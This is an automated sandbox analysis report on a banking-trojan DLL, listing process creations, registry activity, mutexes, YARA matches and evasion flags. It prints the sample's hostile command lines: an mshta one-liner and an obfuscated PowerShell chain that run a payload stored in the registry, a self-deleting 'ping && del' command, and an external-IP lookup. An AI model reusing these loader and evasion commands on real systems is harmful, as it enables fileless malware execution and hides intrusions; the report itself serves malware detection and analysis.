Source: zs5n5sI6N2.dll | Binary or memory string: OriginalFilenamemyfile.exe$ vs zs5n5sI6N2.dll
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: zs5n5sI6N2.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zs5n5sI6N2.dll | ReversingLabs: Detection: 41%
Source: zs5n5sI6N2.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 408
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 436
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1"
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220525
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E47.tmp
Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@29/29@0/2
Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_010068BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{68A2BABC-A7A2-DABF-711C-CBAE35102FC2}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{DC3210A8-8B30-6ECC-F5D0-EF82F90493D6}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3456
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{80D36C7A-DFB0-B2C8-69B4-8306AD28679A}
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string | uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.283526713.000000000040D000.00000002.00000001.01000000.00000003.sdmp, zs5n5sI6N2.dll
Source: Binary string | ntdll.pdb source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string | ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0100828B push ecx; ret 3_2_0100829B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01007EA0 push ecx; ret 3_2_01007EA9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B83D9F push ecx; ret 3_2_05B83DAF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B63495 push ecx; mov dword ptr [esp], 00000002h 3_2_05B63496
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B838A0 push ecx; ret 3_2_05B838A9
Source: C:\Windows\System32\control.exe | Code function: 30_2_00814492 push ss; ret 30_2_00814493
Source: zs5n5sI6N2.dll | Static PE information: section name: .erloc
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey
Source: rn2v1u0v.dll.28.dr | Static PE information: real checksum: 0x0 should be: 0x909a
Source: 0rxpcrxp.dll.32.dr | Static PE information: real checksum: 0x0 should be: 0xaef5
Source: zs5n5sI6N2.dll | Static PE information: real checksum: 0x79835 should be: 0x721d2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dll

Hooking and other Techniques for Hiding and Protection

                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5246b48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.52194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.519a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
